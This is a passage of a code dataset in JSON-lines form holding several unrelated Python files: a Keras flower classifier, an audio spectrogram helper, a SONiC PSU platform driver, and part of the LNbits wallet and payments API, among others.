keras.layers.GlobalAveragePooling2D()(base_model.output)\noutput = keras.layers.Dense(n_classes, activation=\"softmax\")(avg)\nmodel = keras.Model(inputs=base_model.input, outputs=output)\n\nfor layer in base_model.layers:\n layer.trainable = False\noptimizer = keras.optimizers.SGD(lr=0.2, momentum=0.9, decay=0.01)\nmodel.compile(loss=\"sparse_categorical_crossentropy\", optimizer=optimizer,\n metrics=[\"accuracy\"])\nhistory = model.fit(train_set,\n steps_per_epoch=int(0.75 * dataset_size / batch_size),\n validation_data=valid_set,\n validation_steps=int(0.15 * dataset_size / batch_size),\n epochs=5,\n )\n\nfor layer in base_model.layers:\n layer.trainable = True\noptimizer = keras.optimizers.SGD(learning_rate=0.01, momentum=0.9, nesterov=True, decay=0.001)\nmodel.compile(loss=\"sparse_categorical_crossentropy\", optimizer=optimizer,\n metrics=[\"accuracy\"])\ncheckpoint_cb = keras.callbacks.ModelCheckpoint(\"flowersModel.h5\", save_best_only=True)\nearly_stopping_cb = keras.callbacks.EarlyStopping(patience=10, restore_best_weights=True)\nhistory = model.fit(train_set,\n steps_per_epoch=int(0.75 * dataset_size / batch_size),\n validation_data=valid_set,\n validation_steps=int(0.15 * dataset_size / batch_size),\n epochs=40,\n callbacks=[early_stopping_cb, checkpoint_cb]\n )\n\n","repo_name":"Onlee97/ECET380","sub_path":"Assignment2-3/buildAndTrainFlowersModel.py","file_name":"buildAndTrainFlowersModel.py","file_ext":"py","file_size_in_byte":2545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"29705041915","text":"import matplotlib.pyplot as plt\nfrom librosa import display\nimport librosa\nimport numpy as np\nfrom specAugment import spec_augment_tensorflow\n\n\nclass Wav_helper():\n def __init__(self, sig, sr, audio_name):\n # super(Wav_plot, self).__init__()\n self.sig = sig\n self.sr = sr\n self.audio_name = audio_name\n\n # Time-domain waveform\n def time_wave(self):\n plt.figure()\n display.waveplot(self.sig, sr=self.sr, x_axis='time')\n plt.ylabel('Amplitude')\n plt.title(self.audio_name, fontproperties=\"Microsoft JhengHei\")\n\n # Frequency-domain waveform\n def frequence_wavform(self):\n sp = np.fft.fft(self.sig)\n ampSP = np.abs(sp)\n phaseSP = np.unwrap(np.angle(sp))\n time_step = 1. / self.sr\n freqs = np.fft.fftfreq(sp.size, time_step)\n idx = np.argsort(freqs) # from negative to positive\n title = 'frequence_wavform_' + self.audio_name\n plt.figure()\n plt.title(title)\n plt.plot(freqs[idx[len(idx) // 2:]], ampSP[idx[len(idx) // 2:]])\n plt.xlabel('Hz')\n plt.ylabel('Amplitude')\n\n #Spectrogram\n def spec(self):\n X = librosa.stft(self.sig)\n Xdb = librosa.amplitude_to_db(X, ref=1.0)\n plt.figure(figsize=(14, 5))\n librosa.display.specshow(\n Xdb,\n sr=self.sr,\n x_axis='time',\n y_axis='linear',\n cmap='jet',\n )\n plt.colorbar(format=' %+2.0f dB ') # colorbar on the right\n title = 'spectrogram_' + self.audio_name\n plt.title(title, fontproperties=\"Microsoft JhengHei\")\n\n #MFCC Spectrogram\n def Mel_spec(self,\n augment=False,\n time_warping_para=0,\n frequency_masking_para=10,\n time_masking_para=10,\n frequency_mask_num=2,\n time_mask_num=0):\n # extract MFCC coefficients\n mfccs = librosa.feature.mfcc(y=self.sig, sr=self.sr, n_mfcc=22)\n fmax = self.sr / 2 # fmax depends on the sampling rate: raising fmax requires a higher sampling rate, otherwise high frequencies are cut off\n # compute the mel spectrogram parameters\n melspec = librosa.feature.melspectrogram(self.sig,\n self.sr,\n n_mels=128,\n hop_length=None,\n fmax=fmax)\n title = 'Mel spectrogram_' + self.audio_name\n # augment the spectrogram\n if augment == True:\n melspec = spec_augment_tensorflow.spec_augment(\n mel_spectrogram=melspec,\n time_warping_para=time_warping_para,\n frequency_masking_para=frequency_masking_para,\n time_masking_para=time_masking_para,\n frequency_mask_num=frequency_mask_num,\n time_mask_num=time_mask_num)\n title = 'Mel spectrogram_augmented_' + self.audio_name\n\n # convert to log scale\n logmelspec = librosa.power_to_db(np.abs(melspec))\n plt.figure(figsize=(9, 4))\n librosa.display.specshow(logmelspec,\n sr=self.sr,\n x_axis=\"time\",\n y_axis='mel',\n cmap='jet',\n fmax=fmax)\n plt.colorbar(format=' %+2.0f dB ') # colorbar on the right\n\n plt.title(title, fontproperties=\"Microsoft JhengHei\")\n","repo_name":"Jack-Learn/Sound_features","sub_path":"wav_helper.py","file_name":"wav_helper.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"}
{"seq_id":"72501994724","text":"def almostIncreasingSequence(sequence):\n if len(sequence) == 2:\n return True\n\n d = []\n\n for i in range(1, len(sequence)):\n if sequence[i - 1] >= sequence[i]:\n d.append(i - 1)\n\n if len(d) == 0:\n return True\n\n if len(d) == 1:\n if d[0] == 0 or d[0] == len(sequence) - 2:\n return True\n if sequence[d[0] - 1] < sequence[d[0] + 1]:\n return True\n if sequence[d[0]] < sequence[d[0] + 2]:\n return True\n\n return False\n","repo_name":"kanglicheng/codefights","sub_path":"ArcadeUniverse/Intro/EdgeOfTheOcean/AlmostIncreasingSequence.py","file_name":"AlmostIncreasingSequence.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"27798808391","text":"from datetime import datetime\nfrom google.appengine.ext import bulkload\nfrom google.appengine.api import datastore_types\n\nclass StatusLoader(bulkload.Loader):\n def __init__(self):\n bulkload.Loader.__init__(self, 'Status',\n [('user', datastore_types.users.User),\n ('beer', str),\n ('amount', int),\n ('status', datastore_types.Text),\n ('updated_at', lambda x: datetime.strptime(x, '%Y-%m-%d %H:%M:%S')),\n ])\n\nif __name__ == '__main__':\n 
bulkload.main(StatusLoader())\n\n","repo_name":"takatoshiono/ibeer","sub_path":"handlers/test/load/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"69898874085","text":"import json\nfrom typing import List\n\nimport jsonschema\nimport traitlets\n\n\nclass Schema(traitlets.Any):\n \"\"\"any... but validated by a jsonschema.Validator\"\"\"\n\n _validator: jsonschema.Draft7Validator = None\n\n def __init__(self, validator, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._validator = validator\n\n def validate(self, obj, value):\n errors: List[jsonschema.ValidationError] = list(\n self._validator.iter_errors(value)\n )\n if errors:\n msg = \"\"\n for error in errors:\n path = \"/\".join(map(str, error.path))\n msg += f\"\\n#/{path}\\n\\t{error.message}\"\n msg += f\"\\n\\t\\t{json.dumps(error.instance)[:70]}\"\n raise traitlets.TraitError(msg)\n return value\n","repo_name":"jupyrdf/ipyelk","sub_path":"src/ipyelk/trait_types.py","file_name":"trait_types.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"52"} +{"seq_id":"43181422744","text":"from flask import Flask, jsonify, render_template, request\nimport flask.json\n\nfrom messages import LogViewer\n\n\napp = Flask(__name__)\n#app.json_encoder = MessagesEncoder\n\n\n@app.route('/messages/')\ndef channel(channel):\n before_message = request.args.get('before_message')\n return flask.jsonify([m.to_json() for m in LogViewer().tail(channel, 100, before_message)])\n\n\n@app.route('/', defaults={'path':''})\n@app.route('/channel/')\ndef index(path):\n return render_template('index.html')\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"npmcdn-to-unpkg-bot/slack-logs-viewer","sub_path":"web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21259047079","text":"#############################################################################\n# Celestica\n#\n# Module contains an implementation of SONiC Platform Base API and\n# provides the PSUs status which are available in the platform\n#\n#############################################################################\n\nimport os.path\n\ntry:\n from sonic_platform_base.psu_base import PsuBase\n from sonic_platform.fan import Fan\nexcept ImportError as e:\n raise ImportError(str(e) + \"- required module not found\")\n\nFAN_E1031_SPEED_PATH = \"/sys/class/hwmon/hwmon{}/fan1_input\"\nHWMON_PATH = \"/sys/bus/i2c/devices/i2c-{0}/{0}-00{1}/hwmon\"\nFAN_MAX_RPM = 11000\nPSU_NAME_LIST = [\"PSU-R\", \"PSU-L\"]\nPSU_NUM_FAN = [1, 1]\nPSU_I2C_MAPPING = {\n 0: {\n \"num\": 13,\n \"addr\": \"5b\"\n },\n 1: {\n \"num\": 12,\n \"addr\": \"5a\"\n },\n}\n\n\nclass Psu(PsuBase):\n \"\"\"Platform-specific Psu class\"\"\"\n\n def __init__(self, psu_index):\n PsuBase.__init__(self)\n self.index = psu_index\n self.psu_path = \"/sys/devices/platform/e1031.smc/\"\n self.psu_presence = \"psu{}_prs\"\n self.psu_oper_status = \"psu{}_status\"\n self.i2c_num = PSU_I2C_MAPPING[self.index][\"num\"]\n self.i2c_addr = PSU_I2C_MAPPING[self.index][\"addr\"]\n self.hwmon_path = HWMON_PATH.format(self.i2c_num, self.i2c_addr)\n for fan_index in range(0, PSU_NUM_FAN[self.index]):\n fan = Fan(fan_index, 0, is_psu_fan=True, psu_index=self.index)\n self._fan_list.append(fan)\n 
\n def __read_txt_file(self, file_path):\n try:\n with open(file_path, 'r') as fd:\n data = fd.read()\n return data.strip()\n except IOError:\n pass\n return \"\"\n\n def __search_file_by_contain(self, directory, search_str, file_start):\n for dirpath, dirnames, files in os.walk(directory):\n for name in files:\n file_path = os.path.join(dirpath, name)\n if name.startswith(file_start) and search_str in self.__read_txt_file(file_path):\n return file_path\n return None\n\n def get_voltage(self):\n \"\"\"\n Retrieves current PSU voltage output\n Returns:\n A float number, the output voltage in volts,\n e.g. 12.1\n \"\"\"\n psu_voltage = 0.0\n voltage_name = \"in{}_input\"\n voltage_label = \"vout1\"\n\n vout_label_path = self.__search_file_by_contain(\n self.hwmon_path, voltage_label, \"in\")\n if vout_label_path:\n dir_name = os.path.dirname(vout_label_path)\n basename = os.path.basename(vout_label_path)\n in_num = ''.join(list(filter(str.isdigit, basename)))\n vout_path = os.path.join(\n dir_name, voltage_name.format(in_num))\n vout_val = self.__read_txt_file(vout_path)\n psu_voltage = float(vout_val) / 1000\n\n return psu_voltage\n\n def get_current(self):\n \"\"\"\n Retrieves present electric current supplied by PSU\n Returns:\n A float number, the electric current in amperes, e.g. 15.4\n \"\"\"\n psu_current = 0.0\n current_name = \"curr{}_input\"\n current_label = \"iout1\"\n\n curr_label_path = self.__search_file_by_contain(\n self.hwmon_path, current_label, \"cur\")\n if curr_label_path:\n dir_name = os.path.dirname(curr_label_path)\n basename = os.path.basename(curr_label_path)\n cur_num = ''.join(list(filter(str.isdigit, basename)))\n cur_path = os.path.join(\n dir_name, current_name.format(cur_num))\n cur_val = self.__read_txt_file(cur_path)\n psu_current = float(cur_val) / 1000\n\n return psu_current\n\n def get_power(self):\n \"\"\"\n Retrieves current power supplied by PSU\n Returns:\n A float number, the power in watts, e.g. 
302.6\n \"\"\"\n psu_power = 0.0\n current_name = \"power{}_input\"\n current_label = \"pout1\"\n\n pw_label_path = self.__search_file_by_contain(\n self.hwmon_path, current_label, \"power\")\n if pw_label_path:\n dir_name = os.path.dirname(pw_label_path)\n basename = os.path.basename(pw_label_path)\n pw_num = ''.join(list(filter(str.isdigit, basename)))\n pw_path = os.path.join(\n dir_name, current_name.format(pw_num))\n pw_val = self.__read_txt_file(pw_path)\n psu_power = float(pw_val) / 1000000\n\n return psu_power\n\n def get_powergood_status(self):\n \"\"\"\n Retrieves the powergood status of PSU\n Returns:\n A boolean, True if PSU has stablized its output voltages and passed all\n its internal self-tests, False if not.\n \"\"\"\n return self.get_status()\n\n def set_status_led(self, color):\n \"\"\"\n Sets the state of the PSU status LED\n Args:\n color: A string representing the color with which to set the PSU status LED\n Note: Only support green and off\n Returns:\n bool: True if status LED state is set successfully, False if not\n \"\"\"\n # Hardware not supported\n return False\n\n def get_status_led(self):\n \"\"\"\n Gets the state of the PSU status LED\n Returns:\n A string, one of the predefined STATUS_LED_COLOR_* strings above\n \"\"\"\n # Hardware not supported\n return self.STATUS_LED_COLOR_OFF\n\n def get_name(self):\n \"\"\"\n Retrieves the name of the device\n Returns:\n string: The name of the device\n \"\"\"\n return PSU_NAME_LIST[self.index]\n\n def get_presence(self):\n \"\"\"\n Retrieves the presence of the PSU\n Returns:\n bool: True if PSU is present, False if not\n \"\"\"\n psu_location = [\"R\", \"L\"]\n presences_status = self.__read_txt_file(\n self.psu_path + self.psu_presence.format(psu_location[self.index])) or 0\n\n return int(presences_status) == 1\n\n def get_status(self):\n \"\"\"\n Retrieves the operational status of the device\n Returns:\n A boolean value, True if device is operating properly, False if not\n \"\"\"\n psu_location = [\"R\", \"L\"]\n power_status = self.__read_txt_file(\n self.psu_path + self.psu_oper_status.format(psu_location[self.index])) or 0\n\n return int(power_status) == 1\n","repo_name":"Marvell-OpenNOS/sonic-buildimage","sub_path":"device/celestica/x86_64-cel_e1031-r0/sonic_platform/psu.py","file_name":"psu.py","file_ext":"py","file_size_in_byte":6548,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"22276956436","text":"import math\n\nfrom PySide2.QtCore import Qt, QItemSelectionModel, QSignalBlocker\nfrom PySide2.QtWidgets import QTableWidgetItem\n\nfrom hexrd.ui.hexrd_config import HexrdConfig\nfrom hexrd.ui.ui_loader import UiLoader\n\n\nclass MaterialsTable:\n\n def __init__(self, parent=None):\n loader = UiLoader()\n self.ui = loader.load_file('materials_table.ui', parent)\n flags = self.ui.windowFlags()\n self.ui.setWindowFlags(flags | Qt.Tool)\n self.setup_connections()\n\n def setup_connections(self):\n self.ui.table.selectionModel().selectionChanged.connect(\n self.update_ring_selections)\n\n def show(self):\n if not hasattr(self, 'already_shown'):\n self.already_shown = True\n self.move_dialog_to_left()\n\n self.ui.show()\n\n def update_material_name(self):\n self.ui.setWindowTitle(HexrdConfig().active_material_name)\n\n def update_ring_selections(self):\n # This updates the exclusions based upon the table selections\n plane_data = HexrdConfig().active_material.planeData\n selection_model = self.ui.table.selectionModel()\n selected_rows = [x.row() for x in 
selection_model.selectedRows()]\n\n indices = range(len(plane_data.exclusions))\n exclusions = [i not in selected_rows for i in indices]\n plane_data.exclusions = exclusions\n HexrdConfig().flag_overlay_updates_for_active_material()\n HexrdConfig().overlay_config_changed.emit()\n\n def update_table_selections(self):\n # This updates the table selections based on the exclusions\n material = HexrdConfig().active_material\n selection_model = self.ui.table.selectionModel()\n blocker = QSignalBlocker(selection_model) # noqa: F841\n\n selection_model.clear()\n plane_data = material.planeData\n for i, exclude in enumerate(plane_data.exclusions):\n if exclude:\n continue\n\n # Add the row to the selections\n model_index = selection_model.model().index(i, 0)\n command = QItemSelectionModel.Select | QItemSelectionModel.Rows\n selection_model.select(model_index, command)\n\n def update_table(self):\n material = HexrdConfig().active_material\n\n block_list = [\n self.ui.table,\n self.ui.table.selectionModel()\n ]\n blockers = [QSignalBlocker(x) for x in block_list] # noqa: F841\n\n plane_data = material.planeData\n\n # For the table, we will turn off exclusions so that all\n # rows are displayed, even the excluded ones. The user\n # picks the exclusions by selecting the rows.\n previous_exclusions = plane_data.exclusions\n plane_data.exclusions = [False] * len(plane_data.exclusions)\n\n hkls = plane_data.getHKLs(asStr=True)\n d_spacings = plane_data.getPlaneSpacings()\n tth = plane_data.getTTh()\n\n # Restore the previous exclusions\n plane_data.exclusions = previous_exclusions\n\n self.ui.table.clearContents()\n self.ui.table.setRowCount(len(hkls))\n for i, hkl in enumerate(hkls):\n table_item = QTableWidgetItem(hkl)\n table_item.setTextAlignment(Qt.AlignCenter)\n self.ui.table.setItem(i, 0, table_item)\n\n table_item = QTableWidgetItem('%.2f' % d_spacings[i])\n table_item.setTextAlignment(Qt.AlignCenter)\n self.ui.table.setItem(i, 1, table_item)\n\n table_item = QTableWidgetItem('%.2f' % math.degrees(tth[i]))\n table_item.setTextAlignment(Qt.AlignCenter)\n self.ui.table.setItem(i, 2, table_item)\n\n self.update_table_selections()\n self.update_material_name()\n\n def move_dialog_to_left(self):\n # This moves the dialog to the left border of the parent\n parent = self.ui.parent()\n if not parent:\n return\n\n ph = parent.geometry().height()\n px = parent.geometry().x()\n py = parent.geometry().y()\n dw = self.ui.width()\n dh = self.ui.height()\n self.ui.setGeometry(px, py + (ph - dh) / 2.0, dw, dh)\n","repo_name":"cjh1/hexrdgui","sub_path":"hexrd/ui/materials_table.py","file_name":"materials_table.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"34983771313","text":"import asyncio\nimport base64\nimport hashlib\nimport json\nimport uuid\nfrom http import HTTPStatus\nfrom io import BytesIO\nfrom typing import Dict, List, Optional, Union\nfrom urllib.parse import ParseResult, parse_qs, unquote, urlencode, urlparse, urlunparse\n\nimport httpx\nimport pyqrcode\nfrom fastapi import (\n APIRouter,\n Body,\n Depends,\n Header,\n Request,\n WebSocket,\n WebSocketDisconnect,\n)\nfrom fastapi.exceptions import HTTPException\nfrom fastapi.responses import JSONResponse\nfrom loguru import logger\nfrom sse_starlette.sse import EventSourceResponse\nfrom starlette.responses import RedirectResponse, StreamingResponse\n\nfrom lnbits import bolt11, lnurl\nfrom lnbits.core.db import core_app_extra, db\nfrom 
lnbits.core.helpers import (\n migrate_extension_database,\n stop_extension_background_work,\n)\nfrom lnbits.core.models import (\n ConversionData,\n CreateInvoice,\n CreateLnurl,\n CreateLnurlAuth,\n CreateWallet,\n CreateWebPushSubscription,\n DecodePayment,\n Payment,\n PaymentFilters,\n PaymentHistoryPoint,\n Query,\n User,\n Wallet,\n WalletType,\n WebPushSubscription,\n)\nfrom lnbits.db import Filters, Page\nfrom lnbits.decorators import (\n WalletTypeInfo,\n check_admin,\n get_key_type,\n parse_filters,\n require_admin_key,\n require_invoice_key,\n)\nfrom lnbits.extension_manager import (\n CreateExtension,\n Extension,\n ExtensionRelease,\n InstallableExtension,\n fetch_github_release_config,\n get_valid_extensions,\n)\nfrom lnbits.helpers import generate_filter_params_openapi, url_for\nfrom lnbits.settings import settings\nfrom lnbits.utils.exchange_rates import (\n currencies,\n fiat_amount_as_satoshis,\n satoshis_amount_as_fiat,\n)\n\nfrom ..crud import (\n DateTrunc,\n add_installed_extension,\n create_account,\n create_tinyurl,\n create_wallet,\n create_webpush_subscription,\n delete_dbversion,\n delete_installed_extension,\n delete_tinyurl,\n delete_wallet,\n delete_webpush_subscription,\n drop_extension_db,\n get_dbversions,\n get_payments,\n get_payments_history,\n get_payments_paginated,\n get_standalone_payment,\n get_tinyurl,\n get_tinyurl_by_url,\n get_wallet_for_key,\n get_webpush_subscription,\n save_balance_check,\n update_pending_payments,\n update_wallet,\n)\nfrom ..services import (\n InvoiceFailure,\n PaymentFailure,\n check_transaction_status,\n create_invoice,\n fee_reserve_total,\n pay_invoice,\n perform_lnurlauth,\n websocketManager,\n websocketUpdater,\n)\nfrom ..tasks import api_invoice_listeners\n\napi_router = APIRouter()\n\n\n@api_router.get(\"/api/v1/health\", status_code=HTTPStatus.OK)\nasync def health():\n return\n\n\n@api_router.get(\"/api/v1/wallet\")\nasync def api_wallet(wallet: WalletTypeInfo = Depends(get_key_type)):\n if wallet.wallet_type == WalletType.admin:\n return {\n \"id\": wallet.wallet.id,\n \"name\": wallet.wallet.name,\n \"balance\": wallet.wallet.balance_msat,\n }\n else:\n return {\"name\": wallet.wallet.name, \"balance\": wallet.wallet.balance_msat}\n\n\n@api_router.put(\"/api/v1/wallet/{new_name}\")\nasync def api_update_wallet_name(\n new_name: str, wallet: WalletTypeInfo = Depends(require_admin_key)\n):\n await update_wallet(wallet.wallet.id, new_name)\n return {\n \"id\": wallet.wallet.id,\n \"name\": wallet.wallet.name,\n \"balance\": wallet.wallet.balance_msat,\n }\n\n\n@api_router.patch(\"/api/v1/wallet\", response_model=Wallet)\nasync def api_update_wallet(\n name: Optional[str] = Body(None),\n currency: Optional[str] = Body(None),\n wallet: WalletTypeInfo = Depends(require_admin_key),\n):\n return await update_wallet(wallet.wallet.id, name, currency)\n\n\n@api_router.delete(\"/api/v1/wallet\")\nasync def api_delete_wallet(\n wallet: WalletTypeInfo = Depends(require_admin_key),\n) -> None:\n await delete_wallet(\n user_id=wallet.wallet.user,\n wallet_id=wallet.wallet.id,\n )\n\n\n@api_router.post(\"/api/v1/wallet\", response_model=Wallet)\nasync def api_create_wallet(\n data: CreateWallet,\n wallet: WalletTypeInfo = Depends(require_admin_key),\n) -> Wallet:\n return await create_wallet(user_id=wallet.wallet.user, wallet_name=data.name)\n\n\n@api_router.post(\"/api/v1/account\", response_model=Wallet)\nasync def api_create_account(data: CreateWallet) -> Wallet:\n if not settings.new_accounts_allowed:\n raise 
HTTPException(\n            status_code=HTTPStatus.BAD_REQUEST,\n            detail=\"Account creation is disabled.\",\n        )\n    account = await create_account()\n    return await create_wallet(user_id=account.id, wallet_name=data.name)\n\n\n@api_router.get(\n    \"/api/v1/payments\",\n    name=\"Payment List\",\n    summary=\"get list of payments\",\n    response_description=\"list of payments\",\n    response_model=List[Payment],\n    openapi_extra=generate_filter_params_openapi(PaymentFilters),\n)\nasync def api_payments(\n    wallet: WalletTypeInfo = Depends(get_key_type),\n    filters: Filters = Depends(parse_filters(PaymentFilters)),\n):\n    await update_pending_payments(wallet.wallet.id)\n    return await get_payments(\n        wallet_id=wallet.wallet.id,\n        pending=True,\n        complete=True,\n        filters=filters,\n    )\n\n\n@api_router.get(\n    \"/api/v1/payments/history\",\n    name=\"Get payments history\",\n    response_model=List[PaymentHistoryPoint],\n    openapi_extra=generate_filter_params_openapi(PaymentFilters),\n)\nasync def api_payments_history(\n    wallet: WalletTypeInfo = Depends(get_key_type),\n    group: DateTrunc = Query(\"day\"),\n    filters: Filters[PaymentFilters] = Depends(parse_filters(PaymentFilters)),\n):\n    await update_pending_payments(wallet.wallet.id)\n    return await get_payments_history(wallet.wallet.id, group, filters)\n\n\n@api_router.get(\n    \"/api/v1/payments/paginated\",\n    name=\"Payment List\",\n    summary=\"get paginated list of payments\",\n    response_description=\"list of payments\",\n    response_model=Page[Payment],\n    openapi_extra=generate_filter_params_openapi(PaymentFilters),\n)\nasync def api_payments_paginated(\n    wallet: WalletTypeInfo = Depends(get_key_type),\n    filters: Filters = Depends(parse_filters(PaymentFilters)),\n):\n    await update_pending_payments(wallet.wallet.id)\n    page = await get_payments_paginated(\n        wallet_id=wallet.wallet.id,\n        pending=True,\n        complete=True,\n        filters=filters,\n    )\n    return page\n\n\nasync def api_payments_create_invoice(data: CreateInvoice, wallet: Wallet):\n    description_hash = b\"\"\n    unhashed_description = b\"\"\n    memo = data.memo or settings.lnbits_site_title\n    if data.description_hash or data.unhashed_description:\n        if data.description_hash:\n            try:\n                description_hash = bytes.fromhex(data.description_hash)\n            except ValueError:\n                raise HTTPException(\n                    status_code=HTTPStatus.BAD_REQUEST,\n                    detail=\"'description_hash' must be a valid hex string\",\n                )\n        if data.unhashed_description:\n            try:\n                unhashed_description = bytes.fromhex(data.unhashed_description)\n            except ValueError:\n                raise HTTPException(\n                    status_code=HTTPStatus.BAD_REQUEST,\n                    detail=\"'unhashed_description' must be a valid hex string\",\n                )\n        # do not save memo if description_hash or unhashed_description is set\n        memo = \"\"\n\n    async with db.connect() as conn:\n        try:\n            payment_hash, payment_request = await create_invoice(\n                wallet_id=wallet.id,\n                amount=data.amount,\n                memo=memo,\n                currency=data.unit,\n                description_hash=description_hash,\n                unhashed_description=unhashed_description,\n                expiry=data.expiry,\n                extra=data.extra,\n                webhook=data.webhook,\n                internal=data.internal,\n                conn=conn,\n            )\n            # NOTE: we get the checking_id with a separate query because create_invoice\n            # does not return it and it would be a big hassle to change its return type\n            # (used across extensions)\n            payment_db = await get_standalone_payment(payment_hash, conn=conn)\n            assert payment_db is not None, \"payment not found\"\n            checking_id = payment_db.checking_id\n        except InvoiceFailure as e:\n            raise HTTPException(status_code=520, detail=str(e))\n        except Exception as exc:\n            
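# added note: anything unexpected is re-raised unchanged and surfaces as a generic server error\n            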
raise exc\n\n invoice = bolt11.decode(payment_request)\n\n lnurl_response: Union[None, bool, str] = None\n if data.lnurl_callback:\n if data.lnurl_balance_check is not None:\n await save_balance_check(wallet.id, data.lnurl_balance_check)\n\n async with httpx.AsyncClient() as client:\n try:\n r = await client.get(\n data.lnurl_callback,\n params={\n \"pr\": payment_request,\n \"balanceNotify\": url_for(\n f\"/withdraw/notify/{urlparse(data.lnurl_callback).netloc}\",\n external=True,\n wal=wallet.id,\n ),\n },\n timeout=10,\n )\n if r.is_error:\n lnurl_response = r.text\n else:\n resp = json.loads(r.text)\n if resp[\"status\"] != \"OK\":\n lnurl_response = resp[\"reason\"]\n else:\n lnurl_response = True\n except (httpx.ConnectError, httpx.RequestError) as ex:\n logger.error(ex)\n lnurl_response = False\n\n return {\n \"payment_hash\": invoice.payment_hash,\n \"payment_request\": payment_request,\n # maintain backwards compatibility with API clients:\n \"checking_id\": checking_id,\n \"lnurl_response\": lnurl_response,\n }\n\n\nasync def api_payments_pay_invoice(\n bolt11: str, wallet: Wallet, extra: Optional[dict] = None\n):\n try:\n payment_hash = await pay_invoice(\n wallet_id=wallet.id, payment_request=bolt11, extra=extra\n )\n except ValueError as e:\n raise HTTPException(status_code=HTTPStatus.BAD_REQUEST, detail=str(e))\n except PermissionError as e:\n raise HTTPException(status_code=HTTPStatus.FORBIDDEN, detail=str(e))\n except PaymentFailure as e:\n raise HTTPException(status_code=520, detail=str(e))\n except Exception as exc:\n raise exc\n\n return {\n \"payment_hash\": payment_hash,\n # maintain backwards compatibility with API clients:\n \"checking_id\": payment_hash,\n }\n\n\n@api_router.post(\n \"/api/v1/payments\",\n summary=\"Create or pay an invoice\",\n description=\"\"\"\n This endpoint can be used both to generate and pay a BOLT11 invoice.\n To generate a new invoice for receiving funds into the authorized account,\n specify at least the first four fields in the POST body: `out: false`,\n `amount`, `unit`, and `memo`. 
To pay an arbitrary invoice from the funds\n already in the authorized account, specify `out: true` and use the `bolt11`\n field to supply the BOLT11 invoice to be paid.\n \"\"\",\n status_code=HTTPStatus.CREATED,\n)\nasync def api_payments_create(\n wallet: WalletTypeInfo = Depends(require_invoice_key),\n invoiceData: CreateInvoice = Body(...),\n):\n if invoiceData.out is True and wallet.wallet_type == WalletType.admin:\n if not invoiceData.bolt11:\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail=\"BOLT11 string is invalid or not given\",\n )\n return await api_payments_pay_invoice(\n invoiceData.bolt11, wallet.wallet, invoiceData.extra\n ) # admin key\n elif not invoiceData.out:\n # invoice key\n return await api_payments_create_invoice(invoiceData, wallet.wallet)\n else:\n raise HTTPException(\n status_code=HTTPStatus.UNAUTHORIZED,\n detail=\"Invoice (or Admin) key required.\",\n )\n\n\n@api_router.get(\"/api/v1/payments/fee-reserve\")\nasync def api_payments_fee_reserve(invoice: str = Query(\"invoice\")) -> JSONResponse:\n invoice_obj = bolt11.decode(invoice)\n if invoice_obj.amount_msat:\n response = {\n \"fee_reserve\": fee_reserve_total(invoice_obj.amount_msat),\n }\n return JSONResponse(response)\n else:\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail=\"Invoice has no amount.\",\n )\n\n\n@api_router.post(\"/api/v1/payments/lnurl\")\nasync def api_payments_pay_lnurl(\n data: CreateLnurl, wallet: WalletTypeInfo = Depends(require_admin_key)\n):\n domain = urlparse(data.callback).netloc\n\n async with httpx.AsyncClient() as client:\n try:\n r = await client.get(\n data.callback,\n params={\"amount\": data.amount, \"comment\": data.comment},\n timeout=40,\n )\n if r.is_error:\n raise httpx.ConnectError(\"LNURL callback connection error\")\n except (httpx.ConnectError, httpx.RequestError):\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail=f\"Failed to connect to {domain}.\",\n )\n\n params = json.loads(r.text)\n if params.get(\"status\") == \"ERROR\":\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail=f\"{domain} said: '{params.get('reason', '')}'\",\n )\n\n if not params.get(\"pr\"):\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail=f\"{domain} did not return a payment request.\",\n )\n\n invoice = bolt11.decode(params[\"pr\"])\n if invoice.amount_msat != data.amount:\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail=(\n (\n f\"{domain} returned an invalid invoice. Expected\"\n f\" {data.amount} msat, got {invoice.amount_msat}.\"\n ),\n ),\n )\n\n extra = {}\n\n if params.get(\"successAction\"):\n extra[\"success_action\"] = params[\"successAction\"]\n if data.comment:\n extra[\"comment\"] = data.comment\n assert data.description is not None, \"description is required\"\n payment_hash = await pay_invoice(\n wallet_id=wallet.wallet.id,\n payment_request=params[\"pr\"],\n description=data.description,\n extra=extra,\n )\n\n return {\n \"success_action\": params.get(\"successAction\"),\n \"payment_hash\": payment_hash,\n # maintain backwards compatibility with API clients:\n \"checking_id\": payment_hash,\n }\n\n\nasync def subscribe_wallet_invoices(request: Request, wallet: Wallet):\n \"\"\"\n Subscribe to new invoices for a wallet. 
